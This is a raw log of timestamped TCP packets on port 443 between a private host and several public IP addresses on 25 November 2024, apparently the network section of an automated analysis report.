Nov 25, 2024 11:33:46.242554903 CET	49782	443	192.168.2.5	142.250.181.68
Nov 25, 2024 11:33:46.242753983 CET	49782	443	192.168.2.5	142.250.181.68
Nov 25, 2024 11:33:46.242760897 CET	443	49782	142.250.181.68	192.168.2.5
Nov 25, 2024 11:33:46.795486927 CET	443	49789	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:46.798604012 CET	49789	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:46.798618078 CET	443	49789	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:46.799052954 CET	49789	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:46.799057007 CET	443	49789	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:46.980787992 CET	443	49790	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:46.981293917 CET	49790	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:46.981323957 CET	443	49790	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:46.981745958 CET	49790	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:46.981751919 CET	443	49790	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.054809093 CET	443	49791	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.055293083 CET	49791	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.055320978 CET	443	49791	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.055767059 CET	49791	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.055772066 CET	443	49791	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.122850895 CET	443	49793	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.123368025 CET	49793	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.123452902 CET	443	49793	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.123832941 CET	49793	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.123850107 CET	443	49793	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.126878023 CET	443	49794	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.127212048 CET	49794	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.127227068 CET	443	49794	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.127628088 CET	49794	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.127634048 CET	443	49794	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.180898905 CET	49799	443	192.168.2.5	142.250.181.68
Nov 25, 2024 11:33:47.180942059 CET	443	49799	142.250.181.68	192.168.2.5
Nov 25, 2024 11:33:47.181008101 CET	49799	443	192.168.2.5	142.250.181.68
Nov 25, 2024 11:33:47.181226969 CET	49799	443	192.168.2.5	142.250.181.68
Nov 25, 2024 11:33:47.181237936 CET	443	49799	142.250.181.68	192.168.2.5
Nov 25, 2024 11:33:47.232053995 CET	443	49789	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.232104063 CET	443	49789	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.232156992 CET	49789	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.232295036 CET	49789	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.232306004 CET	443	49789	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.232315063 CET	49789	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.232319117 CET	443	49789	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.234873056 CET	49800	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.234941006 CET	443	49800	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.235016108 CET	49800	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.235183001 CET	49800	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.235219955 CET	443	49800	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.415329933 CET	443	49790	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.415416002 CET	443	49790	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.415467978 CET	49790	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.415642977 CET	49790	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.415663958 CET	443	49790	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.415674925 CET	49790	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.415680885 CET	443	49790	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.417728901 CET	49801	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.417754889 CET	443	49801	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.417824030 CET	49801	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.417953014 CET	49801	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.417968035 CET	443	49801	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.498929024 CET	443	49791	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.499006987 CET	443	49791	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.499054909 CET	49791	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.499144077 CET	49791	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.499150038 CET	443	49791	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.499157906 CET	49791	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.499161005 CET	443	49791	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.501122952 CET	49803	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.501147032 CET	443	49803	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.501214981 CET	49803	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.501338005 CET	49803	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.501352072 CET	443	49803	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.548003912 CET	49804	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:47.548085928 CET	443	49804	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:47.548168898 CET	49804	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:47.549186945 CET	49804	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:47.549217939 CET	443	49804	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:47.567545891 CET	443	49793	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.567596912 CET	443	49793	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.567646027 CET	49793	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.567786932 CET	49793	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.567812920 CET	443	49793	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.567862988 CET	49793	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.567874908 CET	443	49793	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.569912910 CET	49805	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.569947004 CET	443	49805	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.570018053 CET	49805	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.570130110 CET	49805	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.570162058 CET	443	49805	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.571960926 CET	443	49794	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.572010994 CET	443	49794	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.572048903 CET	49794	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.572164059 CET	49794	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.572180986 CET	443	49794	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.572190046 CET	49794	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.572195053 CET	443	49794	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.574084044 CET	49806	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.574114084 CET	443	49806	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:47.574187040 CET	49806	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.574311972 CET	49806	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:47.574321985 CET	443	49806	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:48.706453085 CET	49810	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:48.706485033 CET	443	49810	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:48.706574917 CET	49810	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:48.706845999 CET	49810	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:48.706861973 CET	443	49810	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:48.967935085 CET	443	49804	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:48.968007088 CET	49804	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:48.969531059 CET	49804	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:48.969546080 CET	443	49804	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:48.969600916 CET	443	49799	142.250.181.68	192.168.2.5
Nov 25, 2024 11:33:48.969911098 CET	49799	443	192.168.2.5	142.250.181.68
Nov 25, 2024 11:33:48.969926119 CET	443	49799	142.250.181.68	192.168.2.5
Nov 25, 2024 11:33:48.969966888 CET	443	49804	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:48.970232010 CET	443	49799	142.250.181.68	192.168.2.5
Nov 25, 2024 11:33:48.970539093 CET	49799	443	192.168.2.5	142.250.181.68
Nov 25, 2024 11:33:48.970597029 CET	443	49799	142.250.181.68	192.168.2.5
Nov 25, 2024 11:33:49.008023024 CET	49804	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:49.023840904 CET	49799	443	192.168.2.5	142.250.181.68
Nov 25, 2024 11:33:49.051369905 CET	443	49804	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:49.078464031 CET	443	49800	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.079121113 CET	49800	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.079184055 CET	443	49800	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.079617977 CET	49800	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.079632998 CET	443	49800	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.202841043 CET	443	49801	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.203270912 CET	49801	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.203285933 CET	443	49801	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.203695059 CET	49801	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.203700066 CET	443	49801	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.289338112 CET	443	49805	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.289777040 CET	49805	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.289805889 CET	443	49805	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.290266037 CET	49805	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.290282965 CET	443	49805	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.296072006 CET	443	49806	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.296421051 CET	49806	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.296438932 CET	443	49806	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.296911001 CET	49806	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.296916008 CET	443	49806	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.344326019 CET	443	49803	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.346128941 CET	49803	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.346144915 CET	443	49803	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.347242117 CET	49803	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.347246885 CET	443	49803	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.474539042 CET	443	49804	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:49.474740982 CET	443	49804	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:49.474759102 CET	49804	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:49.474867105 CET	443	49804	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:49.474910021 CET	49804	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:49.474910021 CET	49804	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:49.474936008 CET	443	49804	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:49.474956036 CET	443	49804	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:49.513128996 CET	49812	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:49.513158083 CET	443	49812	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:49.513252020 CET	49812	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:49.513515949 CET	49812	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:49.513525963 CET	443	49812	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:49.531783104 CET	443	49800	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.531840086 CET	443	49800	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.532016039 CET	49800	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.532143116 CET	49800	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.532143116 CET	49800	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.532186985 CET	443	49800	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.532217026 CET	443	49800	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.535589933 CET	49813	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.535620928 CET	443	49813	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.535737991 CET	49813	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.535836935 CET	49813	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.535847902 CET	443	49813	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.645139933 CET	443	49801	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.645191908 CET	443	49801	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.645400047 CET	49801	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.645442963 CET	49801	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.645451069 CET	443	49801	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.645461082 CET	49801	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.645464897 CET	443	49801	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.648206949 CET	49814	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.648241997 CET	443	49814	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.648394108 CET	49814	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.649275064 CET	49814	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.649288893 CET	443	49814	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.723967075 CET	443	49805	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.724050999 CET	443	49805	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.724138975 CET	49805	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.731518984 CET	443	49806	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.731583118 CET	443	49806	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.731653929 CET	49806	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.733802080 CET	49805	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.733812094 CET	443	49805	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.734610081 CET	49806	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.734627962 CET	443	49806	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.734694004 CET	49806	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.734699965 CET	443	49806	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.738857985 CET	49815	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.738879919 CET	443	49815	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.738971949 CET	49816	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.738996029 CET	49815	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.739012003 CET	443	49816	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.739073038 CET	49816	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.739156961 CET	49815	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.739170074 CET	443	49815	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.739238977 CET	49816	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.739265919 CET	443	49816	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.797509909 CET	443	49803	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.797564983 CET	443	49803	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.797780991 CET	49803	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.799034119 CET	49803	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.799040079 CET	443	49803	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.799160957 CET	49803	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.799165010 CET	443	49803	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.801697969 CET	49817	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.801732063 CET	443	49817	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.801882982 CET	49817	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.802234888 CET	49817	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:49.802248955 CET	443	49817	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:49.847708941 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:49.847728968 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:49.848220110 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:49.848541975 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:49.848553896 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:49.865695953 CET	49799	443	192.168.2.5	142.250.181.68
Nov 25, 2024 11:33:50.201423883 CET	443	49810	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:50.201507092 CET	49810	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:50.201956987 CET	49810	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:50.201966047 CET	443	49810	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:50.204184055 CET	49810	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:50.204189062 CET	443	49810	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:50.941364050 CET	443	49812	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:50.941440105 CET	49812	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:50.970717907 CET	49812	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:50.970732927 CET	443	49812	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:50.970988989 CET	443	49812	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:51.005899906 CET	49812	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:51.051364899 CET	443	49812	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:51.253134012 CET	443	49813	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.253659964 CET	49813	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.253685951 CET	443	49813	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.254307032 CET	49813	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.254313946 CET	443	49813	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.297498941 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:51.297609091 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:51.297988892 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:51.297996044 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:51.299576044 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:51.299582958 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:51.299628019 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:51.299635887 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:51.299663067 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:51.299669027 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:51.299725056 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:51.299737930 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:51.299742937 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:51.299747944 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:51.299827099 CET	49818	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:51.299834013 CET	443	49818	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:51.336282969 CET	443	49810	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:51.336363077 CET	443	49810	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:51.336376905 CET	49810	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:51.338169098 CET	49810	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:51.341155052 CET	49810	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:51.341171980 CET	443	49810	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:51.479677916 CET	443	49812	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:51.479753017 CET	443	49812	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:51.479840040 CET	49812	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:51.481740952 CET	49812	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:51.481776953 CET	443	49812	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:51.481791973 CET	49812	443	192.168.2.5	23.218.208.109
Nov 25, 2024 11:33:51.481801987 CET	443	49812	23.218.208.109	192.168.2.5
Nov 25, 2024 11:33:51.492508888 CET	443	49814	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.493879080 CET	49814	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.493894100 CET	443	49814	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.494591951 CET	49814	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.494596004 CET	443	49814	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.518600941 CET	443	49816	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.518907070 CET	49816	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.518939972 CET	443	49816	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.519367933 CET	49816	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.519382000 CET	443	49816	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.525000095 CET	443	49815	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.525319099 CET	49815	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.525338888 CET	443	49815	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.525731087 CET	49815	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.525736094 CET	443	49815	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.645267963 CET	443	49817	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.645653009 CET	49817	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.645669937 CET	443	49817	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.646081924 CET	49817	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.646085978 CET	443	49817	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.687648058 CET	443	49813	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.687700033 CET	443	49813	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.687877893 CET	49813	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.687913895 CET	49813	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.687913895 CET	49813	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.687932014 CET	443	49813	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.687941074 CET	443	49813	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.690301895 CET	49819	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.690330982 CET	443	49819	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.690561056 CET	49819	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.690682888 CET	49819	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.690695047 CET	443	49819	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.947505951 CET	443	49814	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.947556019 CET	443	49814	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.947750092 CET	49814	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.947803974 CET	49814	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.947814941 CET	443	49814	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.947824001 CET	49814	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.947829008 CET	443	49814	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.950345993 CET	49820	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.950370073 CET	443	49820	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.950437069 CET	49820	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.950589895 CET	49820	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.950602055 CET	443	49820	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.962321043 CET	443	49816	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.962388992 CET	443	49816	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.962441921 CET	49816	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.962618113 CET	49816	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.962647915 CET	443	49816	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.962677002 CET	49816	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.962709904 CET	443	49816	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.964551926 CET	49821	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.964587927 CET	443	49821	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.964690924 CET	49821	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.964812040 CET	49821	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.964824915 CET	443	49821	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.969845057 CET	443	49815	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.970007896 CET	443	49815	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.970078945 CET	49815	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.970107079 CET	49815	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.970120907 CET	443	49815	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.970129967 CET	49815	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.970134974 CET	443	49815	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.972031116 CET	49822	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.972040892 CET	443	49822	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:51.972114086 CET	49822	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.972206116 CET	49822	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:51.972217083 CET	443	49822	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:52.098737001 CET	443	49817	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:52.098798990 CET	443	49817	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:52.098872900 CET	49817	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:52.099050999 CET	49817	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:52.099067926 CET	443	49817	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:52.099076986 CET	49817	443	192.168.2.5	13.107.246.63
